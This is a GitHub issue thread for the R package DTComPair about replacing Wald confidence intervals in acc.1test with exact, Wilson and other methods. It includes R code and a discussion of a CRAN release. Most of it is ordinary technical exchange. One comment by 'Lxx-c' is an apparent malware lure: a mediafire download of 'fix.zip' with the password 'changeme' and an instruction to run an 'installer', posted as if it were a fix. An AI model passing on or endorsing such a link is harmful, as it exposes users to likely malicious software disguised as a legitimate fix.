### ISSUE TITLE
Better CIs for PPV, NPV, Sens, Spec

### ISSUE THREAD

**Issue by anddis** [chstock/DTComPair#10]
Hello Christian,

I hope you're doing well! I've been using DTComPair for a number of projects (the package got its first citation!) and I have a suggestion that might improve it.

Currently, `acc.1test` uses asymptotic normal-based confidence intervals for PPV, NPV, Sensitivity, and Specificity (eg, lines 89–95 in https://github.com/chstock/DTComPair/blob/main/R/DTComPair.R). 

While this works fine most of the time, I’ve occasionally run into issues with sparse data where the confidence intervals have poor coverage/can be problematic (like if the point estimates are 1 or 0, which cause the asymptotic SE to be 0). 
(Moreover, but this is not related to the CIs, the function throws an error if both the numerator and denominator are 0).

Would you be open to using for example a binomial exact (binom.test) or Wilson (prop.test) confidence interval for PPV, NPV, Sensitivity, and Specificity instead? I’m also open to any other method that improves on the Wald interval and handles 0 or 1 point estimates.

Thank you for considering this suggestion!
Andrea

(PS: I like the hex sticker! 😀)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chstock** [comment]
Hi Andrea,

thanks - I agree, different types of CIs for `acc.1test()`, e.g. exact and Wilson, would make a lot of sense and I had thought about it  too. The user should have the choice (with asymptotic normal or even Wilson as a default). We have `{propCIs}` as a dependency, perhaps this package could be employed.

Please feel free to prepare a PR if you like, otherwise I can put this on my list.

Thanks very much for continuing to improve this package!

Best, Christian

**Comment by anddis** [comment]
Excellent idea to use `{propCI}` if possible. I will look into that and get back to you.

Thank you!
Cheers, Andrea

**Comment by anddis** [comment]
I added a `method.ci` argument to the `acc.1test` function, which accepts functions from `{propCIs}`[A], one of the three new functions that I wrote[B], or really any function written by the user[C].

1. For those methods that do not compute a std.err., a `NA` is printed under `SE`.
2. Most of the methods return a CI if the estimate is 0 or 1, others (`logitci`, `proflikci`) return a `NA`.
3. `acc.1test` no longer throws an error if the denominator of some of the quantities is 0 (the estimate is `NaN`, all the rest is `NA`).

Personally, I would not expose the functions in [B]: they are not intended for general use and it would save us some time to not write the documentation, but of course you have the final say on this. Also, `logitci` and `proflikci` are not really necessary and it is fine by me if you prefer to remove them. I used `waldci` as the default method mainly for reproducibility.

Finally, I fixed a small bug in `acc.paired` where the argument `alpha` was not passed on to the 2 calls to `acc.1test`.

If all this looks reasonable to you (the code is in my forked repo, if you want to have a quick look https://github.com/anddis/DTComPair), I will update the documentation and submit a proper PR for you to review.

Thank you in advance.

Cheers,
Andrea

[A]: `"add4ci", "addz2ci", "blakerci", "exactci", "scoreci", "midPci"`
[B]: `"waldci", "logitci", "proflikci"` in `method.ci.R` 
[C]: so long as the function's arguments and the return object are properly structured

**Comment by chstock** [comment]
> I added a `method.ci` argument to the `acc.1test` function, which accepts functions from `{propCIs}`[A], one of the three new functions that I wrote[B], or really any function written by the user[C].
> 
> 1. For those methods that do not compute a std.err., a `NA` is printed under `SE`.
> 2. Most of the methods return a CI if the estimate is 0 or 1, others (`logitci`, `proflikci`) return a `NA`.
> 3. `acc.1test` no longer throws an error if the denominator of some of the quantities is 0 (the estimate is `NaN`, all the rest is `NA`).

Thanks @anddis  - this looks good to me, it adds quite some flexibility and is user-friendly.

> Personally, I would not expose the functions in [B]: they are not intended for general use and it would save us some time to not write the documentation, but of course you have the final say on this. Also, `logitci` and `proflikci` are not really necessary and it is fine by me if you prefer to remove them. I used `waldci` as the default method mainly for reproducibility.

I think it would be nice to have these functions, but as you said, rather as internal functions, not exposed to the user.

> Finally, I fixed a small bug in `acc.paired` where the argument `alpha` was not passed on to the 2 calls to `acc.1test`.

Thanks for spotting and correcting! :thumbsup:

> If all this looks reasonable to you (the code is in my forked repo, if you want to have a quick look https://github.com/anddis/DTComPair), I will update the documentation and submit a proper PR for you to review.

Yes, all fine from my side. I'd have only one suggestion: it would be nice to have the CI mehod also stored in the results object, e.g. as a list element. This then probably also affects e.g. print functions, so it's a bit of additional work. I could also incorporate it later. Looking forward to the PR.

> Thank you in advance.
> 
> Cheers, Andrea
> 
> [A]: `"add4ci", "addz2ci", "blakerci", "exactci", "scoreci", "midPci"` [B]: `"waldci", "logitci", "proflikci"` in `method.ci.R` [C]: so long as the function's arguments and the return object are properly structured

**Comment by chstock** [comment]
Thank you very much @anddis for the updates on the CI methods which have just been merged! I will prepare the code for a CRAN update and keep this issue open until a new version is on CRAN.

**Comment by chstock** [comment]
Hi @anddis,

a new version of the package (1.2.6) is on CRAN now! Thanks again for your inputs! The added flexibility regarding confidence interval methods is very useful and was overdue...

I made a few changes to the code to avoid check warnings and notes that had to do with the use of internal functions from  `methods.ci.R` and that I otherwise could not (easily) get rid of.

- I integrated `waldci()` and `logitci()` into `acc.1test()`.
- I omitted `proflikci()` from the update, as there was an issue with `MASS:::confint.glm()`  and `family = binomial(link = "identity")` in checks that can perhaps be fixed quickly, but I wasn't sure. If you sooner or later happen to have a fix, I am happy to build it in.
```
proflikci <- function(x, n, conf.level){
  stopifnot(n > 0, x <= n, conf.level > 0, conf.level < 1)
  if (isTRUE(x > 0 & x < n)) {
    glm.fit <- stats::glm(cbind(x, n-x) ~ 1, family = binomial(link = "identity"))
    cint <- suppressMessages(unname(MASS:::confint.glm(glm.fit, level = conf.level)))
    stderr <- NA
  } else { # no stderr and ci if x/n is 0 or 1
    stderr <- uplim <- lowlim <- NA
    cint <- c(lowlim, uplim)
  }
  attr(cint, "conf.level") <- conf.level
  method <- "Profile likelihood"
  rval <- list(stderr = stderr, conf.int = cint, method = method)
  class(rval) <- "htest"
  return(rval)
}
```

- I removed the confidence interval method (`method.ci`) from the outputs of `print.acc.1test()` - it had been my suggestion, but I had second thoughts about this and would at the moment prefer to keep it simple. The method is stored in the list object generated by `acc.1test()`, so the information is not lost after the function call.
- I now also use `asserthat::assert_that()` (at one occasion only so far, but would like to use it more in future updates). `acc.1test()` now requires the confidence interval methods to be from a set of available methods (`waldci`, `logitci` and those from the `{PropCIs}` package). It helps to set `method.ci.fun()`:

``` 
  method.ci.fun <- ifelse(
    test = (method.ci %in% c("waldci", "logitci")),
    yes = get(x = method.ci),
    no = get(x = method.ci, envir = asNamespace("PropCIs"))
  )
```

I hope this works for you. I am happy to incorporate further suggestions if you have any.

Happy to close the issue for now?

Best, Christian

**Comment by anddis** [comment]
This is great, Christian! 
Thank you for dealing with all the check warnings/notes that my edits to the code generated. 
I'm very happy with your changes. 

My initial idea behind using `match.fun` was to allow the user to provide a custom function for the CIs that is not built in DTComPair. But I think the available methods cover most user cases and then some!

So, I think we can close the issue. Thank you!

**Comment by chstock** [comment]
Closing the issue as resolved.
